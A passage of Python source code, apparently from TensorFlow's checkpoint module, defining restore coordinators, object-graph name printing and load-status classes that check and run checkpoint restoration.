if _SESSION_PROVIDER is not None:
session = _SESSION_PROVIDER() # pylint: disable=not-callable
return session
def _get_checkpoint_size(prefix):
"""Calculates filesize of checkpoint based on prefix."""
size = 0
# Gather all files beginning with prefix (.index plus sharded data files).
files = glob.glob("{}*".format(prefix))
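  # E.g. for a (hypothetical) prefix "model.ckpt-1" this matches
  # "model.ckpt-1.index" and shards like "model.ckpt-1.data-00000-of-00001".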
for file in files:
# Use TensorFlow's C++ FileSystem API.
size += metrics.CalculateFileSize(file)
return size
class ObjectGraphProtoPrettyPrinter(object):
"""Lazily traverses an object graph proto to pretty print names.
If no calls to `node_names` are made this object has no performance
overhead. On the other hand, it will only traverse the object graph once, so
repeated naming is cheap after the first.
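  Example usage (a sketch; `object_graph_proto` is assumed to be a parsed
  `TrackableObjectGraph` proto, e.g. the return value of `object_metadata`):
  ```python
  printer = ObjectGraphProtoPrettyPrinter(object_graph_proto)
  for node_id in range(len(object_graph_proto.nodes)):
    print(printer.node_names[node_id])  # e.g. "(root).optimizer.iter"
  ```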
"""
__slots__ = ["_object_graph_proto", "_node_name_cache"]
def __init__(self, object_graph_proto):
self._object_graph_proto = object_graph_proto
self._node_name_cache = None
@property
def node_names(self):
"""Lazily creates a mapping from node id to ("path", "to", "root")."""
if self._node_name_cache is not None:
return self._node_name_cache
path_to_root = {}
path_to_root[0] = ("(root)",)
to_visit = collections.deque([0])
while to_visit:
node_id = to_visit.popleft()
obj = self._object_graph_proto.nodes[node_id]
for child in obj.children:
if child.node_id not in path_to_root:
path_to_root[child.node_id] = (
path_to_root[node_id] + (child.local_name,))
to_visit.append(child.node_id)
node_names = {}
    for node_id, path in path_to_root.items():
      node_names[node_id] = ".".join(path)
for node_id, node in enumerate(self._object_graph_proto.nodes):
for slot_reference in node.slot_variables:
node_names[slot_reference.slot_variable_node_id] = (
f"{node_names[node_id]}'s state '{slot_reference.slot_name}' for "
f"{node_names[slot_reference.original_variable_node_id]}")
self._node_name_cache = node_names
return node_names
class _CheckpointRestoreCoordinatorDeleter(object):
"""Deleter to avoid overriding _CheckpointRestoreCoordinator.__del__()."""
__slots__ = [
"expect_partial", "object_graph_proto", "matched_proto_ids",
"unused_attributes"
]
def __init__(self, expect_partial, object_graph_proto, matched_proto_ids,
unused_attributes):
self.expect_partial = expect_partial
self.object_graph_proto = object_graph_proto
self.matched_proto_ids = matched_proto_ids
self.unused_attributes = unused_attributes
def set_expect_partial(self, expect_partial):
self.expect_partial = expect_partial
def __del__(self):
if self.expect_partial:
return
if logging is None:
# The logging module may have been unloaded when __del__ is called.
log_fn = print
else:
log_fn = logging.warning
unused_nodes_in_checkpoint = []
unrestored_attributes_in_object = []
pretty_printer = ObjectGraphProtoPrettyPrinter(self.object_graph_proto)
for node_id, node in enumerate(self.object_graph_proto.nodes):
if not node.attributes:
continue
if node_id not in self.matched_proto_ids:
unused_nodes_in_checkpoint.append(pretty_printer.node_names[node_id])
for node_id, attribute_name in self.unused_attributes.items():
unrestored_attributes_in_object.append((
pretty_printer.node_names[node_id], attribute_name))
if unused_nodes_in_checkpoint or unrestored_attributes_in_object:
# pylint:disable=line-too-long
log_fn("Detecting that an object or model or tf.train.Checkpoint is being"
" deleted with unrestored values. See the following logs for the "
"specific values in question. To silence these warnings, use "
"`status.expect_partial()`. See "
"https://www.tensorflow.org/api_docs/python/tf/train/Checkpoint#restore"
"for details about the status object returned by the restore "
"function.")
# pylint:enable=line-too-long
for node_path in unused_nodes_in_checkpoint:
log_fn("Value in checkpoint could not be found in the restored object: "
f"{node_path}")
for node_path, attr in unrestored_attributes_in_object:
log_fn("An attribute in the restored object could not be found in the "
f"checkpoint. Object: {node_path}, attribute: {attr}")
class _CheckpointRestoreCoordinator(object):
"""Holds the status of an object-based checkpoint load."""
def __init__(self, object_graph_proto, save_path, save_path_tensor, reader,
restore_op_cache, graph_view, options, saveables_cache):
"""Specify the checkpoint being loaded.
Args:
object_graph_proto: The TrackableObjectGraph protocol buffer associated
with this checkpoint.
save_path: A string, the path to the checkpoint, as returned by
`tf.train.latest_checkpoint`.
save_path_tensor: A string `Tensor` which contains or will be fed the save
path.
reader: A `CheckpointReader` for `save_path`. If None,
`_CheckpointRestoreCoordinator` will initialize one itself.
restore_op_cache: A dictionary shared between
`_CheckpointRestoreCoordinator`s for the same Python objects, used to
look up restore ops by name to avoid re-creating them across multiple
`restore()` calls.
graph_view: A graph_view_lib.ObjectGraphView object for the restored
objects.
options: A CheckpointOptions object.
saveables_cache: An optional cache storing previously created
SaveableObjects created for each Trackable. Maps Trackables to a
dictionary of attribute names to Trackable.
"""
self.options = options
self.object_graph_proto = object_graph_proto
self.restore_uid = ops.uid()
# Maps from proto ids to lists of attributes which were in the checkpoint
# but not loaded into any object, for error checking.
self.unused_attributes = {}
# Dictionary mapping from an id in the protocol buffer flat array to
# Trackable Python objects. This mapping may be deferred if a
# checkpoint is restored before all dependencies have been tracked. Uses
# weak references so that partial restorations don't create reference cycles
# (as objects with deferred dependencies will generally have references to
# this object).
self.object_by_proto_id = weakref.WeakValueDictionary()
self.matched_proto_ids = set()
# A set of all Python objects we've seen as dependencies, even if we didn't
# use them (for example because of inconsistent references when
# loading). Used to make status assertions fail when loading checkpoints
# that don't quite match.
self.all_python_objects = object_identity.ObjectIdentityWeakSet()
self.save_path_tensor = save_path_tensor
self.save_path_string = save_path
self.reader = reader
    if self.reader is None:
      # A NewCheckpointReader for the most recent checkpoint, for streaming
      # Python state restoration.
      self.reader = py_checkpoint_reader.NewCheckpointReader(save_path)
    self.dtype_map = self.reader.get_variable_to_dtype_map()
    self.shape_map = self.reader.get_variable_to_shape_map()
# When graph building, contains a list of ops to run to restore objects from
# this checkpoint.
self.restore_ops = []
self.restore_ops_by_name = restore_op_cache
self.graph_view = graph_view
self.new_restore_ops_callback = None
# A mapping from optimizer proto ids to lists of slot variables to be
# restored when the optimizer is tracked. Only includes slot variables whose
# regular variables have already been created, and only for optimizer
# objects which have not yet been created/tracked.
self.deferred_slot_restorations = {}
# A mapping from variable proto ids to lists of slot variables to be
# restored when the variable is created/tracked. These get shifted over to
# deferred_slot_restorations if the optimizer hasn't been created when that
# happens.
self.slot_restorations = {}
# Controls whether errors are printed in __del__ if some objects did not
# match.
self.expect_partial_attr = False
for node_index, node in enumerate(self.object_graph_proto.nodes):
for slot_reference in node.slot_variables:
# `node` refers to an `Optimizer`, since only these have slot variables.
self.slot_restorations.setdefault(
slot_reference.original_variable_node_id, []).append(
base._SlotVariableRestoration( # pylint: disable=protected-access
optimizer_id=node_index,
slot_variable_id=slot_reference.slot_variable_node_id,
slot_name=slot_reference.slot_name))
self._deleter = _CheckpointRestoreCoordinatorDeleter(
self.expect_partial_attr,
self.object_graph_proto,
self.matched_proto_ids,
self.unused_attributes)
self.saveables_cache = saveables_cache
@property
def expect_partial(self):
return self.expect_partial_attr
@expect_partial.setter
def expect_partial(self, expect_partial):
self.expect_partial_attr = expect_partial
self._deleter.set_expect_partial(expect_partial)
def new_restore_ops(self, new_ops):
self.restore_ops.extend(new_ops)
if self.new_restore_ops_callback:
self.new_restore_ops_callback(new_ops) # pylint: disable=not-callable
def restore_saveables(self,
tensor_saveables,
python_saveables,
registered_savers=None):
"""Run or build restore operations for SaveableObjects.
Args:
tensor_saveables: `SaveableObject`s which correspond to Tensors.
python_saveables: `PythonStateSaveable`s which correspond to Python
values.
      registered_savers: a dict mapping saver names -> object names ->
        Trackables.
Returns:
When graph building, a list of restore operations, either cached or newly
created, to restore `tensor_saveables`.
"""
restore_ops = []
# Eagerly run restorations for Python state.
for saveable in python_saveables:
spec_names = [spec.name for spec in saveable.specs]
saveable.python_restore(
[self.reader.get_tensor(name) for name in spec_names])
# If we have new SaveableObjects, extract and cache restore ops.
if tensor_saveables or registered_savers:
validated_saveables = saveable_object_util.validate_and_slice_inputs(
tensor_saveables)
validated_names = set(saveable.name for saveable in validated_saveables)
if set(tensor_saveables.keys()) != validated_names:
raise AssertionError(
"Saveable keys changed when validating. Got back "
f"{tensor_saveables.keys()}, was expecting {validated_names}")
new_restore_ops = functional_saver.MultiDeviceSaver(
validated_saveables,
registered_savers).restore(self.save_path_tensor, self.options)
if not context.executing_eagerly():
for name, restore_op in sorted(new_restore_ops.items()):
restore_ops.append(restore_op)
assert name not in self.restore_ops_by_name
self.restore_ops_by_name[name] = restore_op
return restore_ops
class _NameBasedRestoreCoordinator(object):
"""Keeps the status of a name-based checkpoint restore."""
def __init__(self, save_path, dtype_map=None):
self.save_path = save_path
self.dtype_map = dtype_map
# A map from trackable objects to unused attribute names. We don't have
# proto IDs when doing a name-based restore, so the map keys differ from
# those in _CheckpointRestoreCoordinator.
self.unused_attributes = object_identity.ObjectIdentityWeakKeyDictionary()
self.restore_uid = ops.uid()
def globally_named_object_attributes(self, trackable):
"""Create globally named SaveableObjects from attributes.
If an object's attribute has no global name specified (default construction
for the SaveableObject factory), records the failure in
`self.unused_attributes` (which can then be used to make status assertions
fail; see `NameBasedSaverStatus`).
Args:
trackable: An object to save.
Yields:
SaveableObjects for `trackable`'s attributes.
"""
for attribute_name, saveable_factory in (
trackable._gather_saveables_for_checkpoint().items()): # pylint: disable=protected-access
if callable(saveable_factory):
try:
# This saveable object factory does not have a default name= argument,
# which means there's no way to save/restore it using a name-based
# checkpoint. Ignore the error now and make sure assert_consumed()
# fails.
saveable = saveable_factory()
except TypeError:
self.unused_attributes.setdefault(trackable,
[]).append(attribute_name)
continue
else:
saveable = saveable_factory
names_to_saveables = saveable_object_util.op_list_to_dict(
[saveable], convert_variable_to_tensor=False)
for name, op in names_to_saveables.items():
for saveable_object in saveable_object_util.saveable_objects_for_op(
op=op, name=name):
yield saveable_object
def eager_restore(self, trackable):
"""Runs restore ops for `trackable`'s attributes."""
# When graph building, we don't add any restore ops to the graph until
# run_restore_ops/initialize_or_restore on the status object for name-based
# checkpoints.
assert context.executing_eagerly()
for saveable in self.globally_named_object_attributes(trackable):
restored_tensors = []
tensor_missing = False
for spec in saveable.specs:
if spec.name in self.dtype_map:
with ops.device("cpu:0"):
restored, = io_ops.restore_v2(
prefix=self.save_path,
tensor_names=[spec.name],
shape_and_slices=[""],
dtypes=[self.dtype_map[spec.name]],
name="%s_checkpoint_read" % (spec.name,))
restored_tensors.append(array_ops.identity(restored))
else:
tensor_missing = True
if tensor_missing:
# Record that this variable didn't match so assertions will fail.
self.unused_attributes.setdefault(trackable, []).append(saveable.name)
else:
# Ignores values missing from the checkpoint, as with object-based
# restore. Status assertions can be used to check exact matches,
# although it's unlikely to ever happen for name-based checkpoints.
saveable.restore(
restored_tensors=restored_tensors, restored_shapes=None)
# TODO(allenl): If this ends up in a public API, consider adding LINT.IfChange
# or consolidating the implementation with get_variable.
def _default_getter(name,
shape,
dtype,
initializer=None,
partition_info=None,
**kwargs):
"""A pared-down version of get_variable which does not reuse variables."""
dtype = dtypes.as_dtype(dtype)
shape_object = tensor_shape.as_shape(shape)
with ops.init_scope():
if initializer is None:
initializer, initializing_from_value = (
variable_scope._get_default_variable_store()._get_default_initializer( # pylint: disable=protected-access
name=name,
shape=shape_object,
dtype=dtype))
else:
initializing_from_value = not callable(initializer)
# Same logic as get_variable
variable_dtype = dtype.base_dtype
if initializing_from_value:
if shape is not None:
raise ValueError("If initializer is a constant, do not specify shape.")
initial_value = initializer
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
shape_list = None if shape is None else shape_object.as_list()
if "partition_info" in tf_inspect.getargspec(initializer).args:
initial_value = functools.partial(initializer,
shape_list,
dtype=dtype,
partition_info=partition_info)
else:
initial_value = functools.partial(initializer,
shape_list,
dtype=dtype)
return variables.VariableV1(
initial_value=initial_value,
name=name,
dtype=variable_dtype,
use_resource=True,
**kwargs)
def add_variable(trackable,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
trainable=True):
"""Add a variable to a Trackable with no scope influence."""
return trackable._add_variable_with_custom_getter( # pylint: disable=protected-access
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
getter=_default_getter,
trainable=trainable)
def object_metadata(save_path):
"""Retrieves information about the objects in a checkpoint.
Example usage:
```python
object_graph = tf.contrib.checkpoint.object_metadata(
tf.train.latest_checkpoint(checkpoint_directory))
ckpt_variable_names = set()
for node in object_graph.nodes:
for attribute in node.attributes:
ckpt_variable_names.add(attribute.full_name)
```
Args:
save_path: The path to the checkpoint, as returned by `save` or
`tf.train.latest_checkpoint`.
Returns:
A parsed `tf.contrib.checkpoint.TrackableObjectGraph` protocol buffer.
Raises:
ValueError: If an object graph was not found in the checkpoint.
"""
reader = py_checkpoint_reader.NewCheckpointReader(save_path)
try:
object_graph_string = reader.get_tensor(base.OBJECT_GRAPH_PROTO_KEY)
except errors_impl.NotFoundError:
raise ValueError(
f"The specified checkpoint \"{save_path}\" does not appear to be "
"object-based (saved with TF2) since it is missing the key "
f"\"{base.OBJECT_GRAPH_PROTO_KEY}\". Likely it was created with the "
"TF1 name-based saver and does not contain an object dependency graph.")
object_graph_proto = (trackable_object_graph_pb2.TrackableObjectGraph())
object_graph_proto.ParseFromString(object_graph_string)
return object_graph_proto
def list_objects(root_trackable):
"""Traverse the object graph and list all accessible objects.
Looks for `Trackable` objects which are dependencies of
`root_trackable`. Includes slot variables only if the variable they are
slotting for and the optimizer are dependencies of `root_trackable`
(i.e. if they would be saved with a checkpoint).
Args:
root_trackable: A `Trackable` object whose dependencies should be flattened.
Returns:
A flat list of objects.
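  Example usage (a minimal sketch):
  ```python
  root = autotrackable.AutoTrackable()
  root.v = variables.Variable(1.)
  objects = list_objects(root)  # contains `root` and `root.v`
  ```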
"""
return util.list_objects(graph_view_lib.ObjectGraphView(root_trackable))
def gather_initializers(root_trackable):
"""Traverse the object graph and find initialization ops.
Looks for `Trackable` objects which are dependencies of
`root_trackable` and which have an `initializer` property. Includes
initializers for slot variables only if the variable they are slotting for and
the optimizer are dependencies of `root_trackable` (i.e. if they would be
saved with a checkpoint).
Args:
root_trackable: A `Trackable` object to gather initializers for.
Returns:
A list of initialization ops.
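  Example usage (a sketch; only meaningful when graph building, since
  initializers run on creation when executing eagerly):
  ```python
  root = autotrackable.AutoTrackable()
  root.v = variables.Variable(1.)
  init_ops_to_run = gather_initializers(root)
  # session.run(init_ops_to_run) in a tf.compat.v1.Session.
  ```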
"""
trackable_objects = list_objects(root_trackable)
return [
c.initializer
for c in trackable_objects
if hasattr(c, "initializer") and c.initializer is not None
]
@tf_contextlib.contextmanager
def capture_dependencies(template):
"""Capture variables created within this scope as `Template` dependencies.
Requires that `template.variable_scope` is active.
This scope is intended as a compatibility measure, allowing a trackable
object to add dependencies on variables created in a block of code which is
not aware of object-based saving (and instead uses variable names
heavily). This is how `Template` objects add dependencies on variables and
sub-`Template`s. Where possible, use `tf.compat.v1.make_template` directly.
Args:
template: The `Template` object to register dependencies with.
Yields:
None (when used as a context manager).
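  Example (schematic only; assumes `template` came from
  `tf.compat.v1.make_template` and that its variable scope is active):
  ```python
  with variable_scope.variable_scope(template.variable_scope):
    with capture_dependencies(template):
      v = variable_scope.get_variable("v", shape=[])
      # `v` is now a dependency of `template` under the scope-stripped
      # name "v".
  ```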
"""
name_prefix = template.variable_scope.name
def _trackable_custom_creator(next_creator,
name,
initial_value,
trackable_parent=None,
**kwargs):
"""A variable creation hook which adds Trackable dependencies.
Set for example during a `Template`'s first wrapped function
execution. Ensures that (a) `template` depends on any trackable
objects using their own `capture_dependencies` scope inside this scope which
create variables, and (b) that any variables not in a more deeply nested
scope are added as dependencies directly.
The `trackable_parent` argument is passed between custom creators but
ignored when the variable object itself is created. This argument indicates
(if not `None`) that a more deeply nested scope has already added the
variable as a dependency, and that parent scopes should add a dependency on
that object rather than on the variable directly.
Args:
next_creator: See `variable_scope.variable_creator_scope`; the next
creator in the chain.
name: The (full, scope-influenced) name of the variable. The `name_prefix`
itself is stripped for the purposes of object-based dependency tracking,
but scopes opened within this scope are respected.
initial_value: See `variable_scope.variable_creator_scope`. Taken
explicitly so the argument can be re-named and used with
`Trackable._add_variable_with_custom_getter`.
trackable_parent: If not None, a more deeply nested trackable object and
its name prefix which were passed to `capture_dependencies` to add a
dependency on (rather than depending on the variable directly).
**kwargs: Passed through to the next creator.
Returns:
The output of `next_creator`: the fetched/created variable object.
"""
def _call_next_creator_renaming_initializer(initializer, **inner_kwargs):
inner_kwargs.pop("name") # Ignored; this is the scope-stripped name which
# we don't want to propagate.
return next_creator(initial_value=initializer, name=name, **inner_kwargs)
if name is not None and name.startswith(name_prefix):
scope_stripped_name = name[len(name_prefix) + 1:]
if not trackable_parent:
return template._add_variable_with_custom_getter( # pylint: disable=protected-access
initializer=initial_value,
name=scope_stripped_name,
getter=_call_next_creator_renaming_initializer,
# Disable error checking for Trackable. Exceptions are instead
# raised if necessary when the object-based saver tries to
# save/restore the object.
overwrite=True,
trackable_parent=(template, name_prefix),
**kwargs)
else:
parent_object, parent_name_prefix = trackable_parent
template._track_trackable( # pylint: disable=protected-access
parent_object,
name=parent_name_prefix[len(name_prefix) + 1:],
overwrite=True)
return next_creator(
name=name,
initial_value=initial_value,
trackable_parent=(template, name_prefix),
**kwargs)
with variable_scope.variable_creator_scope(_trackable_custom_creator):
yield
class _LoadStatus(object):
"""Abstract base for load status callbacks."""
@abc.abstractmethod
def assert_consumed(self):
"""Raises an exception unless a non-trivial restoration has completed."""
pass
@abc.abstractmethod
def assert_existing_objects_matched(self):
"""Raises an exception unless existing Python objects have been matched."""
pass
@abc.abstractmethod
def assert_nontrivial_match(self):
"""Raises an exception if only the root object matched."""
pass
@abc.abstractmethod
def run_restore_ops(self, session=None):
"""Runs restore ops from the checkpoint. Requires a valid checkpoint."""
pass
@abc.abstractmethod
def initialize_or_restore(self, session=None):
"""Runs restore ops from the checkpoint, or initializes variables."""
pass
def expect_partial(self):
"""Silence warnings about incomplete checkpoint restores."""
return self
@tf_export("__internal__.tracking.streaming_restore", v1=[])
def streaming_restore(status, session=None):
"""When graph building, runs restore ops as soon as they come in.
Args:
    status: A _LoadStatus object from an object-based saver's restore().
      Streaming restore from name-based checkpoints is not currently
      supported.
session: A session to run new restore ops in.
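  Example usage (a sketch; `ckpt` is a `tf.train.Checkpoint` and `save_path`
  an existing checkpoint prefix):
  ```python
  status = ckpt.restore(save_path)
  streaming_restore(status, session=session)
  # Restore ops created later (e.g. for deferred variables) run immediately.
  ```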
"""
if context.executing_eagerly():
# Streaming restore is the default/only behavior when executing eagerly.
return
if session is None:
session = get_session()
if isinstance(status, NameBasedSaverStatus):
raise NotImplementedError(
"Streaming restore not supported from name-based checkpoints when "
"graph building. File a feature request if this limitation bothers "
"you. As a workaround, consider either using tf.train.Checkpoint to "
"load name-based checkpoints or enabling eager execution.")
status.run_restore_ops(session=session)
# pylint: disable=protected-access
status._checkpoint.new_restore_ops_callback = (
lambda ops: session.run(ops, feed_dict=status._feed_dict))
# pylint: enable=protected-access
def _objects_with_attributes(full_list):
"""Filters out objects with no direct variable dependencies for assertions."""
return [o for o in full_list if o._gather_saveables_for_checkpoint()] # pylint: disable=protected-access
class CheckpointLoadStatus(_LoadStatus):
"""Checks the status of checkpoint loading and manages restore ops.
Returned from `Saver.restore`. Since `restore` may defer the loading of values
in the checkpoint which don't yet have corresponding Python objects,
`CheckpointLoadStatus` provides a callback to verify that checkpoint loading
is complete (`assert_consumed`).
When graph building, `restore` does not run restore ops itself since their
creation may be deferred. The `run_restore_ops` method must be called once all
Python objects with values to restore have been created and added to the
dependency graph (this does not necessarily have to be the whole checkpoint;
calling `run_restore_ops` while `assert_consumed` fails is supported and will
partially restore the checkpoint).
See `Saver.restore` for usage examples.
"""
def __init__(self, checkpoint, feed_dict, graph_view):
self._checkpoint = checkpoint
self._feed_dict = feed_dict
self._object_graph_view = graph_view
# Keep a reference to the root, since object_graph_view might only have a
# weakref.
self._root = graph_view.root
def assert_consumed(self):
"""Asserts that all objects in the checkpoint have been created/matched.
Returns:
`self` for chaining.
Raises:
AssertionError: If there are any Python objects in the dependency graph
which have not been restored from this checkpoint or a later `restore`,
or if there are any checkpointed values which have not been matched to
Python objects.
"""
pretty_printer = ObjectGraphProtoPrettyPrinter(
self._checkpoint.object_graph_proto)
self.assert_existing_objects_matched()
for node_id, node in enumerate(self._checkpoint.object_graph_proto.nodes):
if not node.attributes:
# Only raise exceptions for the nodes with attributes themselves. Either
# they're ultimately not important, or they have a child with an
# attribute.
continue
trackable = self._checkpoint.object_by_proto_id.get(node_id, None)
if trackable is None:
raise AssertionError(
"Unresolved object in checkpoint "
f"{pretty_printer.node_names[node_id]}: {node}")
if self._checkpoint.slot_restorations:
# Sanity check; this collection should be clear if everything has been
# restored.
raise AssertionError(
f"Unresolved slot restorations: {self._checkpoint.slot_restorations}")
if self._checkpoint.unused_attributes:
unused_attribute_messages = []
for node_id, attribute in six.iteritems(
self._checkpoint.unused_attributes):
obj = self._checkpoint.object_by_proto_id[node_id]
unused_attribute_messages.append(
f"{pretty_printer.node_names[node_id]} ({obj}): {attribute}")
joined_attribute_messages = "\n".join(unused_attribute_messages)
raise AssertionError(
"Unused attributes in these objects (the attributes exist in the "
f"checkpoint but were not restored):\n{joined_attribute_messages}")
return self
def assert_existing_objects_matched(self):
"""Asserts that trackable Python objects have been matched.
Note that this is a weaker assertion than `assert_consumed`. It will only
fail for existing Python objects which are (transitive) dependencies of the
root object and which do not have an entry in the checkpoint.
It will not fail, for example, if a `tf.keras.Layer` object has not yet been
built and so has not created any `tf.Variable` objects.
Returns:
`self` for chaining.
Raises:
AssertionError: If a Python object exists in the transitive dependencies
of the root object but does not have a value in the checkpoint.
"""
for node_id, node in enumerate(self._checkpoint.object_graph_proto.nodes):
trackable = self._checkpoint.object_by_proto_id.get(node_id, None)
if (trackable is not None and
trackable._update_uid < self._checkpoint.restore_uid): # pylint: disable=protected-access
raise AssertionError(
f"Object {node} not assigned a value from checkpoint.")
for trackable_object in util.list_objects(self._object_graph_view):
# Remove data structures that do not contain any variables from
# restoration checks.
if (isinstance(trackable_object,
data_structures.TrackableDataStructure) and
not trackable_object._trackable_children()): # pylint: disable=protected-access
continue
self._checkpoint.all_python_objects.add(trackable_object)
unused_python_objects = (
object_identity.ObjectIdentitySet(
_objects_with_attributes(
self._checkpoint.all_python_objects)) -
object_identity.ObjectIdentitySet(
self._checkpoint.object_by_proto_id.values()))
if unused_python_objects:
num_unused_python_objects = len(list(unused_python_objects))
      # Show at most 10 of the unmatched objects in the error message.
num_variables_to_show = min(10, num_unused_python_objects)
raise AssertionError(
f"Found {num_unused_python_objects} Python objects that were "
"not bound to checkpointed values, likely due to changes in the "
f"Python program. Showing {num_variables_to_show} of "
f"{num_unused_python_objects} unmatched objects: "
f"{list(unused_python_objects)[:num_variables_to_show]}")
return self
def assert_nontrivial_match(self):
"""Raises an exception if only the root object matched."""
for trackable_object in util.list_objects(self._object_graph_view):
self._checkpoint.all_python_objects.add(trackable_object)
if len(self._checkpoint.object_by_proto_id) <= 1:
unused_python_objects = (
object_identity.ObjectIdentitySet(
_objects_with_attributes(self._checkpoint.all_python_objects)) -
object_identity.ObjectIdentitySet(
self._checkpoint.object_by_proto_id.values()))
if unused_python_objects:
raise AssertionError(
"Nothing except the root object matched a checkpointed value. "
"Typically this means that the checkpoint does not match the "
"Python program. The following objects have no matching "
f"checkpointed value: {list(unused_python_objects)}")
else:
raise AssertionError(
"Nothing to load. No dependencies have been added to "
f"{self._object_graph_view.root} yet.")
return self
def run_restore_ops(self, session=None):
"""Run operations to restore objects in the dependency graph."""
if context.executing_eagerly():
return # Run eagerly
if session is None:
session = get_session()
session.run(self._checkpoint.restore_ops, feed_dict=self._feed_dict)
def initialize_or_restore(self, session=None):
"""Run operations to initialize or restore objects in the dependency graph.
Any objects in the dependency graph which have initializers but are not in
the checkpoint will have those initializers run, unless those variables are
being restored by a later call to `tf.train.Checkpoint.restore()`.
This method has a sibling in `InitializationOnlyStatus` which instead
initializes variables. That type is returned if no checkpoint is specified
in `Saver.restore`.
Args:
session: The session to run init/restore ops in. If `None`, uses the
default session.
"""
if context.executing_eagerly():
return # Initialization and restoration ops are run eagerly
if session is None:
session = get_session()
all_objects = util.list_objects(self._object_graph_view)
already_initialized_objects = object_identity.ObjectIdentitySet(
self._checkpoint.object_by_proto_id.values())
initializers_for_non_restored_variables = [
c.initializer for c in all_objects
if hasattr(c, "initializer")
and c not in already_initialized_objects
and (getattr(c, "_update_uid", self._checkpoint.restore_uid - 1)
< self._checkpoint.restore_uid)
]
self.run_restore_ops(session=session)
session.run(initializers_for_non_restored_variables)
def expect_partial(self):
"""Silence warnings about incomplete checkpoint restores."""
self._checkpoint.expect_partial = True
return self
class InitializationOnlyStatus(_LoadStatus):
"""Returned from `Saver.restore` when no checkpoint has been specified.
Objects of this type have the same `assert_consumed` method as
`CheckpointLoadStatus`, but it always fails. However,
`initialize_or_restore` works on objects of both types, and will
initialize variables in `InitializationOnlyStatus` objects or restore them
otherwise.
"""
def __init__(self, object_graph_view, restore_uid):
self._restore_uid = restore_uid
self._object_graph_view = object_graph_view
# Keep a reference to the root, since graph_view might only have a weakref.
self._root = object_graph_view.root
def assert_consumed(self):
"""Assertion for consistency with `CheckpointLoadStatus`. Always fails."""
raise AssertionError(
"No checkpoint specified (save_path=None); nothing is being restored.")
def assert_existing_objects_matched(self):
"""Assertion for consistency with `CheckpointLoadStatus`. Always fails."""
raise AssertionError(
"No checkpoint specified (save_path=None); nothing is being restored.")
def assert_nontrivial_match(self):
"""Assertion for consistency with `CheckpointLoadStatus`. Always fails."""
raise AssertionError(
"No checkpoint specified (save_path=None); nothing is being restored.")
def run_restore_ops(self, session=None):
"""For consistency with `CheckpointLoadStatus`.
Use `initialize_or_restore` for initializing if no checkpoint was passed
to `Saver.restore` and restoring otherwise.
Args:
session: Not used.
"""
raise AssertionError(
"No checkpoint specified, so no restore ops are available "
"(save_path=None to Saver.restore).")
def initialize_or_restore(self, session=None):
"""Runs initialization ops for variables.
Objects which would be saved by `Saver.save` will be initialized, unless
those variables are being restored by a later call to
`tf.train.Checkpoint.restore()`.
This method does nothing when executing eagerly (initializers get run
eagerly).
Args:
session: The session to run initialization ops in. If `None`, uses the
default session.
"""
if context.executing_eagerly():
return # run eagerly
if session is None:
session = get_session()
trackable_objects = util.list_objects(self._object_graph_view)
initializers = [
c.initializer for c in trackable_objects
if hasattr(c, "initializer") and c.initializer is not None
and (getattr(c, "_update_uid", self._restore_uid - 1)
< self._restore_uid)
]
session.run(initializers)
_DEPRECATED_RESTORE_INSTRUCTIONS = (
"Restoring a name-based tf.train.Saver checkpoint using the object-based "
"restore API. This mode uses global names to match variables, and so is "
"somewhat fragile. It also adds new restore ops to the graph each time it "
"is called when graph building. Prefer re-encoding training checkpoints in "
"the object-based format: run save() on the object-based saver (the same "
"one this message is coming from) and use that checkpoint in the future.")
class NameBasedSaverStatus(_LoadStatus):
"""Status for loading a name-based training checkpoint."""
# Ideally this deprecation decorator would be on the class, but that
# interferes with isinstance checks.
@deprecation.deprecated(
date=None, instructions=_DEPRECATED_RESTORE_INSTRUCTIONS)
def __init__(self, checkpoint, object_graph_view):
self._checkpoint = checkpoint
self._object_graph_view = object_graph_view
self._optionally_restored = []
# Keep a reference to the root, since graph_view might only have a weakref.
self._root = object_graph_view.root
def add_to_optionally_restored(self, var):
"""Add a variable to the list of optionally restored variables.
There are situations where certain variables should be ignored in assertions
such as assert_existing_objects_matched(). One example is that of a
checkpoint saved with train.Saver(), and restored with train.Checkpoint():
it is possible for the train.Saver() checkpoint to be missing the internal
`save_counter` variable, which we want to ignore on restore.
Args:
var: The variable to treat as optionally restored.
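    Example (a sketch; `status` is the `NameBasedSaverStatus` returned by a
    `tf.train.Checkpoint.restore` of a name-based checkpoint):
    ```python
    status.add_to_optionally_restored(ckpt.save_counter)
    status.assert_existing_objects_matched()  # ignores `save_counter`
    ```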
"""
self._optionally_restored.append(var)
def assert_consumed(self):
"""Raises an exception if any variables are unmatched."""
unused_attributes = list(self._checkpoint.unused_attributes.items())
unused_attributes = [
a for a in unused_attributes
if all(a[0] is not x for x in self._optionally_restored)
]
if unused_attributes:
unused_attribute_strings = [
f"\n {obj}: {attributes}" for obj, attributes in unused_attributes]
raise AssertionError(
"Some objects had attributes which were not restored: "
f"{unused_attribute_strings}")
for trackable in util.list_objects(self._object_graph_view):
# pylint: disable=protected-access
trackable._maybe_initialize_trackable()
if trackable._update_uid < self._checkpoint.restore_uid:
raise AssertionError(f"Object not restored: {trackable}")
# pylint: enable=protected-access
return self
def assert_existing_objects_matched(self):
"""Raises an exception if currently created objects are unmatched."""
# For name-based checkpoints there's no object information in the
# checkpoint, so there's no distinction between
# assert_existing_objects_matched and assert_consumed (and both are less
# useful since we don't touch Python objects or Python state).
return self.assert_consumed()
def assert_nontrivial_match(self):
"""Raises an exception if currently created objects are unmatched."""
# For name-based checkpoints there's no object information in the
# checkpoint, so there's no distinction between
# assert_nontrivial_match and assert_consumed (and both are less
# useful since we don't touch Python objects or Python state).
return self.assert_consumed()
def _gather_saveable_objects(self):
"""Walk the object graph, using global names for SaveableObjects."""
objects = util.list_objects(self._object_graph_view)
saveable_objects = []
for trackable in objects:
# pylint: disable=protected-access
trackable._maybe_initialize_trackable()
if trackable._update_uid < self._checkpoint.restore_uid:
trackable._update_uid = self._checkpoint.restore_uid
else:
continue
# pylint: enable=protected-access
saveable_objects.extend(
self._checkpoint.globally_named_object_attributes(trackable))
return saveable_objects
def run_restore_ops(self, session=None):
"""Load the name-based checkpoint using a new `tf.compat.v1.train.Saver`."""
if context.executing_eagerly():
return # Nothing to do, variables are restored on creation.
if session is None:
session = get_session()
with ops.device("/cpu:0"):
saveables = self._gather_saveable_objects()
